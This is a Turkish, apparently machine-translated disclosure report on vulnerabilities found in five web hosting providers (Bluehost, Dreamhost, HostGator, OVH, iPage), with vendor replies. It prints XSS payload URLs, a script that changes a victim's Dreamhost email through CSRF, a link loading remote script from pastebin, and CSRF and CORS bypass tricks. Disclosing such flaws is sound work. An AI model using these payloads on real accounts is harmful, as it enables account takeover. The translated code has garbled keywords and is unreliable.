Rapor: 5 Popüler Web Hosting Şirketini Test ettik ve Hepsi Kolayca Saldırıldı

Bu rapor ilk olarak Ocak 2019’da yayınlandı


Bu araştırmanın amacı, web sitelerinin barındırılıp barındırılmadığını görmek ve Bluehost, Dreamhost, HostGator, OVH veya iPage tek tıklamayla istemci tarafı güvenlik açıklarından ödün verilebilir. Ne yazık ki, test ettiğimiz tüm platformlarda en az bir istemci tarafı güvenlik açığı bulduk ve kurban bir bağlantıyı tıkladığında veya kötü amaçlı bir web sitesini ziyaret ettiğinde hesabın ele geçirilmesine izin verdik.

Test ettiğimiz tüm platformlar, önemli sayıda kullanıcıya sahip popüler barındırma sağlayıcılarıdır. Web Sitesi Gezegeni’nde hedefimiz okuyucularımıza en dürüst ve bilgilendirici incelemeler sunmaktır ve güvenlik önemli bir faktördür. Bu nedenle, incelediğimiz hizmetleri test etmek için zaman zaman deneyimli güvenlik araştırmacıları tutuyoruz. Güvenlik açıkları bulunursa, gerekli iyileştirmeleri yapabilmeleri için bunları satıcılara bildiririz.

Bu araştırma, daha önce çeşitli cihaz ve yazılımlardaki sorunları ortaya çıkaran deneyimli bir güvenlik araştırmacısı Paulos Yibelo tarafından yapıldı..

Bluehost – Çoklu Hesap Devralma ve Bilgi Sızıntısı Güvenlik Açıkları

1. CORS Yanlış Yapılandırmaları Yoluyla Bilgi Sızıntısı

şiddet: Yüksek

Etki: Bu güvenlik açığı saldırganların şunları çalmasını sağlar:

  1. İsim, konum (şehir, cadde, eyalet, ülke), telefon numarası, posta kodu vb. Gibi Kişisel Olarak Tanımlanabilir Bilgiler (PII).
  2. Kredi kartının son kullanma ayını ve yılını, kredi kartının son 4 hanesini, kredi kartındaki adı, kredi kartı türünü ve ödeme yöntemini içeren Kısmi Ödeme Ayrıntıları.
  3. Kullanıcının barındırdığı WordPress, Mojo, SiteLock ve OAuth destekli çeşitli uç noktalara erişim verebilecek simgeler.

Bluehost, kaynakları etki alanları arasında paylaşmak için kaynak kökenli kaynak paylaşımı (CORS) kullanır. CORS, tarayıcılar aracılığıyla web siteleri arasında iletişimi sağlamak için Aynı Köken Politikasını rahatlatmak için bir mekanizmadır. Bazı CORS yapılandırmalarının tehlikeli olduğu, ancak bazı çıkarımların kolayca yanlış anlaşıldığı yaygın olarak anlaşılmaktadır..

Belirli etki alanları için CORS’a izin veren Bluehost için API uç noktasını gördükten sonra, hangi web sitelerinin nelere erişmesine izin verileceğini görmek için filtreleri atlamaya çalıştık.

Web siteleri, aşağıdaki HTTP yanıt üstbilgisini göndererek CORS’yi etkinleştirebilir:

Access-Control-Allow-Origin:
https://my.bluehost.com/

Yukarıdaki HTTP yanıtı herhangi bir web sitesinde görülürse, tarayıcıya https://my.bluehost.com sitesinin içeriğini okumasına izin vermesini söyler.

Bluehost’un durumunda, belirsiz değerleri kabul eden gevşek bir düzenli ifade gördük. Örneğin, isteği gönderen tarayıcı https://my.bluehost.com.evil.com adresinden geliyorsa, Bluehost şu yanıtı vererek izin verir:

Access-Control-Allow-Origin:
https://my.bluehost.com.evil.com

Gördüğünüz gibi, Bluehost sadece ilk dizeleri kontrol etti ve Bluehost.com’dan sonra ne geldiğini düşünmedi. Bu, kötü niyetli saldırganların my.bluehost.com.EVILWEBSITE.com adlı bir alt etki alanına ev sahipliği yapabileceği ve Bluehost’un EVILWEBSITE.com’un içeriğini okumasına izin vereceği anlamına gelir.

Bluehost üzerinden tarama yapan API uç noktası, kişisel olarak tanımlanabilen bilgilerden, Bluehost tarafından barındırılan bir hesabı devralmak için çeşitli simgeleri sızdırabilen teknik uç noktalara kadar çok “sulu” bilgiler döndürür.

İlk olarak, / api / users uç noktasına giderek – bir saldırgan user_id sızdırabilir. Ardından saldırgan, bu kullanıcı ve içeriğini sorgulamak için bu user_id öğesini kullanabilir. Saldırgan ayrıca e-posta, ad ve soyadı, kullanıcının konumu ve ayrıca WordPress, Mojo, SiteLock ve çeşitli uç noktalarına erişim sağlayabilen jetonlar sızdırabilir.

Rapor: 5 Popüler Web Hosting Şirketini Test ettik ve Hepsi Kolayca Saldırıldı

Yukarıda görebileceğiniz gibi, web sitesi isteği aslında Bluehost’da değil, evilwebsite.com’da barındırılıyor, ancak API Yanıtı, yanıtında verilerini okumasına izin veriyor.

2. Yanlış JSON istek doğrulaması CSRF nedeniyle Hesap Devralma

şiddet: Orta Yüksek

Etki: Bu güvenlik açığı, saldırganların herhangi bir Bluehost kullanıcısının e-posta adresini istedikleri adrese değiştirmesine olanak tanır ve ardından bir mağdur tek bir bağlantıyı tıkladığında veya tek bir web sitesini ziyaret ettiğinde kurbanın hesabına tam erişim elde etmek için yeni e-postalarını kullanarak şifreyi sıfırlar..

Bu güvenlik açığından, Bluehost’un istekleri işlemesi ve doğrulamasıyla ilgili bazı yanlış yapılandırmalar nedeniyle yararlanılabilir..

Kullanıcılar ad, telefon numarası, adres veya e-posta gibi kişisel bilgilerini değiştirmeye çalıştıklarında, Bluehost aşağıdaki isteği gönderir:

Rapor: 5 Popüler Web Hosting Şirketini Test ettik ve Hepsi Kolayca Saldırıldı

Dikkatli bakarsanız, bu istekle gönderilen benzersiz bir belirteç olmadığını fark edeceksiniz. Bu, herhangi bir web sitesinin isteği söz konusu uç nokta çapraz menşeine gönderebileceği ve bilgilerinizi değiştirebileceği anlamına gelir.

Normalde, bu istek JSON’da olduğu ve bu tür istekleri gönderebilmek için Adobe Flash Player’dan yararlanılması gerektiği için mümkün olmaz – ancak hepimiz Flash’ın öldüğünü biliyoruz. Bununla birlikte, Bluehost’un durumunda, özel numaralar ve sunucu yanlış yapılandırmaları, Flash’ı kullanmadan herhangi bir tarayıcıda çalışmasına izin verir:

Yukarıdaki HTML kodu, ihtiyacımız olana benzer bir JSON isteği oluşturacak, {"ülke":"BİZE","telefon":"+1.NEWPHONE","1. Sokak":"YENİ SOKAK","Soyadı":"Soyadı","E-posta":"[email protected]","Kent":"YENİ","posta kodu":"0000","bölge":"WA","İsim":"FirstName = ”, kuruluş":boş}

Tarayıcılar normalde giriş adının sonuna = (eşittir işareti) eklediğinden, JSON’u FirstName’de eşittir işaretini içerecek şekilde değiştirebilir ve kalan değerleri “value” özniteliğine ekleyebiliriz: organization ”: null}

Gördüğünüz gibi, istek Content-Type ile gönderilecek: application / json ile değil text / plain – ancak Bluehost bunun farkında değil, bu da istismarımızı çapraz kökenli yapıyor.

Normalde, Bluehost yönlendirme alanının bluehost.com olup olmadığını kontrol eder – istek başka bir web sitesinden gönderilirse, Bluehost isteği 500 yanıtla reddeder.

Bu, meta etiketteki Content = ”no-referrer” kullanılarak kolayca atlanabilir, çünkü yönlendiren gönderilmezse Bluehost, isteğe izin verir.

3. CORS Şemasının Yanlış Doğrulanması Nedeniyle Ortadaki Adam

şiddet: Orta

Etki: Bu güvenlik açığı, genel Wi-Fi veya yerel ağ (LAN) gibi kurbanın internet ağı içindeki bir saldırganın, içeriğini şifrelemek için SSL / HTTPS trafiğini kullanan Bluehost’a rağmen kurbanın Bluehost ile ilişkili trafiğinin içeriğini düz metin olarak okumasına izin verir.

Bu güvenlik açığı 1 numaralı sorunu (CORS Yanlış Yapılandırması) temel almaktadır – ancak etki alanını doğrulamak yerine, bu durumda Bluehost, içeriğini okumasına izin verirken düzeni / protokolü doğrulamaz..

Rapor: 5 Popüler Web Hosting Şirketini Test ettik ve Hepsi Kolayca Saldırıldı

Yanıtta da görebileceğiniz gibi, Bluehost içeriğini okumak için bir HTTP etki alanı veriyor. Bu, tarayıcıya HTTP etki alanının içeriğine erişmesine izin vermesini bildirir (şifrelenmemiş) – bu eski sürüm saldırısı Bluehost tarafından SSL Sertifikası kullanımını tamamen işe yaramaz hale getirir ve bir HTTPS isteğini kullanma amacını tamamen ortadan kaldırır.

4. my.bluehost.com adresindeki XSS, hesabın devralınmasına izin veriyor

Önem: Orta Yüksek

Etki: bu güvenlik açığı, bir saldırganın bluehost.com’da istemci olarak komut yürütmesine izin verir – bu, e-posta adresi de dahil olmak üzere içeriği değiştirme, değiştirme ve ekleme yeteneği anlamına gelir. Saldırgan, mağdurla ilgili içeriği okuyabilir veya mağdur kötü niyetli bir bağlantıyı tıkladığında veya bir web sitesini ziyaret ettiğinde web sitesindeki içeriği değiştirebilir.

Rapor: 5 Popüler Web Hosting Şirketini Test ettik ve Hepsi Kolayca Saldırıldı

İki düşük etkili sorun bu güvenlik açığını inanılmaz derecede tehlikeli hale getirir. Birincisi, Bluehost’un bir kişinin e-posta adresini değiştirirken geçerli bir şifre gerektirmemesidir. Bu, XSS kullanarak kişinin e-posta adresini değiştirebileceği ve şifreyi sıfırlayabileceği anlamına gelir.

İkincisi, Bluehost’un hassas çerezlerinde herhangi bir HttpOnly bayrağı ayarlamaması. Bu, herhangi bir JavaScript’in bunlara erişebileceği ve kötü niyetli bir saldırgana gönderebileceği ve saldırganın kullanıcı olarak kimlik doğrulaması yapmak için bu çerezleri kullanabileceği anlamına gelir.

PoC: https://my.bluehost.com/cgi/dm/subdomain/redirect?domainkey= ”>uyarı (belge.domain)

Videoyu buradan izleyin:

Dreamhost XSS ve Bilginin Açığa Çıkması Güvenlik Açıkları

1. XSS ile Hesabın Devralınması

şiddet: Orta Yüksek

Etki: Bu güvenlik açığı, bir saldırganın mağdurun e-postasını veya parolasını, mağdur bir bağlantıyı veya kötü amaçlı bir web sitesini ziyaret ettiğinde istediği şekilde kolayca değiştirmesine olanak tanır.

Yük kapasitesi:

https://panel.dreamhost.com/tree=domain.manage&CURRENT_STEP = Endeksi&next_step = ShowAddhttp&domain =: lol”>

DreamHost, e-posta adresinizi değiştirmek için bir şifre istemediğinden bu, hesap devralmaya genişletilebilir, bu nedenle bir saldırgan herhangi bir hesabı devralmak için bu XSS güvenlik açığını kullanarak CSRF saldırısı gerçekleştirebilir.

{(.Ajax, $
url: "https://panel.dreamhost.com/id/?tab=contact&Komut = düzenle",
yöntem: "İLETİ",
veri tipi: "html",
başarı: işlev (yanıt)
{
var security_cookie =
$ (Response) .find ("giriş [ad = ‘security_cookie’]") .Val ();
(.Post, $ "https://panel.dreamhost.com/id/?", {sekmesi: "İletişim",
komut: "submit_edit", security_cookie: security_cookie, önek: "", ilk
: "Santa", orta : "", son : "Bluh", sonek: "", 1. Sokak : "Nurit 103",
sokak2: "", Kent : "Ora", durum : "Kudüs" , zip: "90880" , ülke:
"IL" , e-posta: "[email protected]",telefon:"+954.8888777",faks: "", sohbet :"",
twitter:"",url:""}). done (işlev (veri) {
console.log (veri);
});
console.log (security_cookie);
},
hata: işlev (hata)
{
console.log ($ hatası);
}
});

Yukarıdaki JavaScript, panel.dreamhost.com tarafından yürütüldüğünde, giriş yapılan e-posta adresini [email protected] olarak değiştirir – bu, XSS güvenlik açığımızla yapılabilir.

https://panel.dreamhost.com/tree=domain.manage¤t_step=Index&next_step = ShowAddhttp&alan = lol% 22% 3E% 0A% 3Cscript% 20async% 20src =% 22 // pastebin.com / ham / 65CayjA7% 22% 3E% 3C / komut% 3E% 0A% 3Cscript% 3E% 20var% 20x% 20 =% 20,% 22 / *

Bir kurban yukarıdaki bağlantıyı yine de ziyaret ettiğinde, e-posta adreslerini saldırganlara değiştirecek.

Videoyu buradan izleyin:

HostGator Bilgi İfşası ve Çoklu Güvenlik Açıkları

1. Tam kontrol sağlayan Sitewide CSRF Koruma Baypas

Önem: Yüksek

Etki: Bu güvenlik açığı, web sitesinin kullanıcının hesap bölümünün her yerinde bulunmaktadır. Bir saldırgan, bir mağdur bir bağlantıyı tıkladığında veya kötü amaçlı bir web sitesini ziyaret ettiğinde, e-posta adresi ve kişisel bilgiler dahil olmak üzere mağdurun profiline herhangi bir değer ekleyebilir, düzenleyebilir veya değiştirebilir.

HostGator normalde herhangi bir form gönderimi ile anti-CSRF belirteçleri kullanır. Bununla birlikte, sunucu, POST parametre belirtecini belirteç [] = değiştirerek ve boş bırakarak anti-CSRF belirteçlerini yoksaymak için kandırılabilir – bu, CSRF denetiminin doğru olarak geçmesini sağlar. Bu bir sahte kod örneği ile bir tür hokkabazlık güvenlik açığı olabilir şüpheli:

if (strcasecmp ($ _ GET [‘jeton’]],"$ csrf_token") == 0) {

Yukarıdaki işlev, özellikle C / C ++ ‘dan web geliştirmeye geçtiyse, çoğu programcı için yeterli görünebilir. İşlev, yalnızca dizeler aynıysa true olarak değerlendirilirmiş gibi görünse de, değişkene bir dizi verilirse, NULL yanıtının geri verilmesi de söz konusudur. PHP’nin karşılaştırmasına göre, örneğin, NULL aslında 0’dır. Dolayısıyla, geçerli olarak geçer!

Veri = changeaction&belirteci [] =

Sahip oldukları ikinci CSRF karşıtı jeton, yönlendirici tabanlı bir kontroldür. İsteğin http://portal.hostgator.com/anything adresinden gelip gelmediğini kontrol ediyorlar mı? – ancak bu, web sitesinde bu tür yerlerde yaygın olan açık bir yönlendirme kullanılarak kolayca atlanabilir..

2. Bilgi Sızıntısı ve CRLF’ye yol açan çoklu CORS Yanlış Yapılandırmaları

A. Bilgi Kaçağı

şiddet: Orta Yüksek

Etki: Bu güvenlik açığı, saldırganların CORS yanlış yapılandırması nedeniyle HostGator’dan gelen API yanıtlarını okumasına olanak tanır. API yanıtı, tüm müşteri ve alan adı ayrıntılarıyla yanıt verir.

Rapor: 5 Popüler Web Hosting Şirketini Test ettik ve Hepsi Kolayca Saldırıldı

HostGator’un Access-Control-Allow-Origin yanıtında görebileceğiniz gibi, evil.com’un (örnek alan adı) yanıt içeriğine erişmesine izin veriyor.

Bunun nedeni, HostGator’un yanıtını okumaya izin verilen alanlarla eşleşmesi için zayıf düzenli ifade kontrolünden kaynaklanmaktadır. .Hostgator.com geçişi ile biten herhangi bir web sitesine izin verir – bu, http://evil.com/?null=portal.hostgator.com ve evil.com \ @. Hostgator.com gibi yükleri göndermek anlamına geliyordu. .Hostgator.com’dan önce herhangi bir karaktere izin verilmesi gerçeği her türlü sorunu yaratır.

B. Microsoft Edge ve Internet Explorer’da CRLF Enjeksiyonu

şiddet: Orta

Etki: Bu güvenlik açığı yalnızca Microsoft Edge ve Internet Explorer kullanan HostGator kullanıcılarını etkiler. Saldırganların yeni başlıklar enjekte etmesine ve muhtemelen istemci tarafı komut dosyaları yürütmesine olanak tanır.

Gönderilen herhangi bir karakterin CORS üstbilgisi yanıtında herhangi bir kodlama yapılmadan ve hatta \ r gibi yasa dışı karakterler için denetlenmeden yanıtlanması, IE / Edge kullanıcılarına Internet Explorer ve Edge görünümü \ olarak HTTP üstbilgisi enjeksiyon güvenlik açığımız olduğu anlamına gelir. r (0x0d) geçerli bir HTTP başlık sonlandırıcısı olarak:

C. CORS Şemasının Yanlış Doğrulanması Nedeniyle Ortadaki Adam

şiddet: Orta

Etki: Bu güvenlik açığı, uygun bir SSL / HTTPS trafiği kullanan HostGator’a rağmen, kurbanın İnternet trafiği içindeki bir saldırganın genel Wi-Fi veya yerel ağ (LAN) gibi kurbanın HostGator API’sı ile ilişkili trafiğinin içeriğini düz metin olarak okumasına izin verir. içeriğini şifrelemek.

# 1A ekran görüntüsünde görüldüğü gibi – .hostgator.com ile bitiyorsa Access-Control-Allow-Origin’de her şey kabul edilir. Bu aynı zamanda yukarıdaki ekran görüntüsünde görebileceğiniz herhangi bir protokol veya şema anlamına gelir – http://anything.hostgator.com yerel bir saldırganın CORS kullanarak HTTPS yanıtını okumasına izin verir. Bu güvenlik açığı yalnızca herhangi bir HostGator alt etki alanında barındırılan herhangi bir XSS veya benzeri bir güvenlik açığının çalıştığı anlamına gelmez, aynı zamanda herhangi bir yerel ağ saldırganının CORS yanıtlarını okuyabilmesi anlamına gelir.

Videoyu buradan izleyin:

OVH Bilginin Açığa Çıkması ve Çoklu Güvenlik Açıkları

1. CSRF koruma Bypass

şiddet: Yüksek

Etki: Bu güvenlik açığı web sitesinin her yerinde bulunmaktadır. Saldırgan, kimliği doğrulanmış bir kurban bir bağlantıyı tıkladığında veya kötü amaçlı bir web sitesini ziyaret ettiğinde, e-posta adresi ve kişisel bilgiler dahil olmak üzere mağdurun profiline herhangi bir değer ekleyebilir, düzenleyebilir veya değiştirebilir.

OVH iki tip anti-CSRF savunması implante etti. Birincisi, isteğin İçerik Türü uygulama / json ikincisi ise yönlendiren web sitesinin “ovh.com” olup olmadığından emin olmaktır. Bunu neden yeterli olmadığına ayıralım.

Bu ikisi normalde diğer web siteleri tarafından taklit edilemese de, her iki durumda da OVH için çalışan basit bypass’lar bulduk.

xhr.setRequestHeader (‘İçerik Türü’, ’metin / düz; uygulama / json’);

Tarayıcılar göndermeyi reddedecek uygulama / json olarak İçerik türü, ancak göndererek ‘metin / düz; uygulama / json’- isteğin geçmesine izin verilecek, sunucu yalnızca uygulama / json İçerik Türü başlığında bulunur.

İkinci koruma yönlendirme kontrolüdür, normalde yönlendirme kontrolleri yaygın bir şekilde yanlış anlaşılır ve kolayca atlanabilir karşı önlemler.

OVH’nin durumunda: sunucu kontrol edilirken istek “ovh.com” dan geldi – şema umurunda değildi – “ovh.com” un hem HTTP hem de HTTPS sürümleri geçerli yönlendiriciler olarak kabul edildi. Herhangi bir MITM durumunda, http://ovh.com (HTTP, saldırganın enjekte ettiği içerik) DNS’sini taklit edebilir – kurban göz attığında, bunları CSRF yükü ile https://ovh.com (HTTPS) ‘e yönlendirir. burada hem HTTP hem de HTTPS şemalarına izin verildiği için yönlendirme denetimini etkili bir şekilde sahtekârlaştırır. (Bu, OVH’nin HSTS’yi nasıl zorlamamasından kaynaklanmaktadır, ancak bunu yaparak kolayca hafifletilebilir)

Yönlendiren tabanlı CSRF korumaları, yaygın olarak bilinmeyen bir gerçek için tarayıcılar genellikle işe yaramaz. Birçok büyük tarayıcıda dikkate aldıkları güvenlik hataları vardır DÜŞÜK öncelik WONTFIX web sitelerinin yönlendirmelerini aldatmasına olanak tanır. Microsoft Edge durumunda, örneğin Manuel Caballero, tarayıcıda hala sabit olmayan (ve muhtemelen yakında değil) hoş bir yönlendirici parodi hatası buldu – kullanıcı tarafından kontrol edilebilir veriler gönderen tarayıcılara geçiş yapan ve onlara güvenen web siteleri ciddi bir soruna neden oluyor.

Özetlemek:

– Google Mail’in çalışma şekli sayesinde, [email protected] adresine gönderilen bir e-posta aslında [email protected] adresine gidecektir.

{ “NEWEMAIL”:”[email protected]”}

‘metin / düz; application / json ’Content-Type başlığı, e-postaları yalnızca HTML formlarıyla değiştirebilir. Yönlendiren, tarayıcı hataları kullanılarak veya MITM ile taklit edilebilir.

iPage Hesabı Devralma ve Birden Çok Güvenlik Açığı

1. Hesap Devralma

şiddet: Yüksek

Etki: Bu güvenlik açığı, kurban bir bağlantıyı tıkladığında veya bir web sitesini ziyaret ettiğinde saldırganın herhangi bir iPage hesabını uzaktan ele geçirmesine olanak tanır.

Bu güvenlik açığı, iPage’in Parola Değiştir sayfasındaki garip bir özellikten kaynaklanmaktadır. iPage, şifrenizi değiştirmek için eski / mevcut şifrenizi gerektirmez ve istekle ilişkili benzersiz jetonlar yoktur.

Bu, herhangi bir web sitesinin kurbanın kullanıcı adıyla iPage’e yeni bir şifre ile çapraz kökenli bir istek gönderebileceği ve iPage’in şifresini saldırganın istediği şekilde değiştireceği anlamına gelir.

https://www1.ipage.com/api/2.0/user/ipg.username/password

Rapor: 5 Popüler Web Hosting Şirketini Test ettik ve Hepsi Kolayca Saldırıldı

Yukarıdaki istekte de görebileceğiniz gibi, tanımlayıcı, yönlendiren gönderilmeden ipg.username veya benzersiz jetonlardır – çapraz kökenli hesap alımına izin verir!

2. Çoklu İçerik Güvenliği Politikası Atlama

şiddet: Orta

Etki: Bu, saldırganların iPage’in herhangi bir API yanıtına tıklama saldırıları gerçekleştirmesine ve CSP’yi içerik ve komut dosyası enjeksiyon saldırılarıyla atlamasına olanak tanır.

iPage, API uç noktalarını korumak için Content-Security-Policy kullanır, saldırganların kötü amaçlı komut dosyaları yürütmemesi için içerik enjekte etmesini durdurmak ve yalnızca belirli sayfaların API yanıt uç noktasını çerçevelemesine izin vermek için vardır..

Şöyle görünüyor:

İçerik-Güvenlik-Politika: çerçeve-ataların ‘öz’ http: //*.impress.ly http: //*.dragndropbuilder.com https: //*.weeblycloud.com https: //*.sitelock.com https: //*.mojomarketplace.com http: //*.ipage.com http: //*.yourhostingaccount.com https: //*.ecwid.com

X-Frame-Options: SAMEORIGIN İZİN VER-http: //*.impress.ly http: //*.dragndropbuilder.com https: //*.weeblycloud.com https: //*.sitelock.com https: // * .mojomarketplace.com http: //*.ipage.com http: //*.yourhostingaccount.com https: //*.ecwid.com

Gördüğünüz gibi, birden fazla anahtar özellik ve bileşen eksik:

A. Çerçeve Atalara Ortadaki Adam Saldırısı

Dikkatlice bakarsanız, çerçeve ataları özelliğinin birden çok HTTP (şifrelenmemiş) sayfanın çerçevelemesine izin verdiğini görebilirsiniz. Bu, bir Wi-Fi ağındaki veya genel İnternet’teki herhangi bir yerel saldırganın adresi sahtekarlık yapan bir HTTP etki alanı barındırabileceği ve iPage’in yanıtlarının onun tarafından çerçevelenmesine izin vereceği anlamına gelir..

Internet Explorer 11 gibi bazı tarayıcıların CSP’yi desteklemediği düşünüldüğünde, aynı şeyi söyleyen bir X-Frame-Options üstbilgisi de vardır – ancak gördüğünüz gibi, bu http: // gibi aynı HTTP alanlarına da izin verir * .impress.ly, http: //*.ipage.com ve daha fazlası.

B. Eksik Nitelikler Nedeniyle Tam Bypass

Gördüğünüz gibi, CSP’nin script-src veya object-src etiketleri yok, yani herhangi bir HTML enjeksiyon uç noktası bulan herhangi bir saldırgan, siteler arası komut dosyası saldırıları gerçekleştirebilecek.

Videoyu buradan izleyin:

Sonrası

15 Ocak 2019

Test ettiğimiz beş web barındırma hizmetinden, hepsinin kolayca saldırıya uğradığını tespit ettik. Bu, hangi barındırma hizmetini kullanırsanız kullanın, web sitenizin güvenliğini artırmak için her zaman ek önlemler aldığınızdan emin olmanız gerektiği anlamına gelir. Idan Ben Or, SEO uzmanı şunları kaydetti: “Gördüğümüz en önemli paket, en büyük web sunucularının bile yaşlanma altyapısından muzdarip olması ve bu sağlayıcıların kapsadığı altı artı milyon etki alanını hedeflemek için kolayca bir hata eklenebileceğidir. Ve bu nedenle, bilgisayar korsanlarının bir tür karmaşık saldırıya gerek duymazlar, hemen ön kapıdan yürüyebilirler. ”

Tepkiler

Dreamhost raporumuza ilk yanıt veren:

İlk olarak, bu istismar ve güvenlik açığı hakkında bize bilgi verdiğiniz için teşekkür etmek istiyorum.

Sorumlu açıklamaların ve güvenlik kusurlarının görünürlüğünün interneti herkes için daha güvenli bir yer haline getirdiğine inanıyorum.

Şu anda üretimde eski panelimizden CSRF’nin kullanılmasını önleyecek bir düzeltmemiz var. Dreamhost.com/id/ gönderim formları ve geri kalan uç noktalarımızda güvenliği artırmak ve girdileri dezenfekte etmek için çaba sarf ediyoruz.

Ayrıca çalışan Endurance’dan aşağıdaki yanıtı aldık Bluehost, iPage ve HostGator:

Şunu belirtmek istedim… Paylaştığınız güvenlik açıklarının dahili bir analizinden sonra, belirlediğiniz olası güvenlik açıklarını gidermek ve düzeltmek için adımlar attık.

İşlemimiz sırasında Bluehost’un hesabımızı yeniden işaretlediğini ve belirsiz bir şekilde kapattığını da unutmamak gerekir. Kesin bir neden belirtilmedi; ancak, saldırı tamamlandıktan sonra yapıldığından, bunun sadece ne yaptığımızı gördükleri için olduğunu varsayabiliriz. İyi iş, Bluehost … ama biraz geç.

Web sitesi güvenliği hakkında daha fazla bilgi edinmek ister misiniz? Şu makalelere göz atın:

Bir Web Sitesinden Öğrenebileceğimiz 10 Şey Veri İhlali

WordPress Web Sitelerinin Saldırıları İçin 3 Neden + Kendinizi Koruma

Güvenlik için En İyi WordPress Eklentileri – Web Sitenizi Güvende Tutun

Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map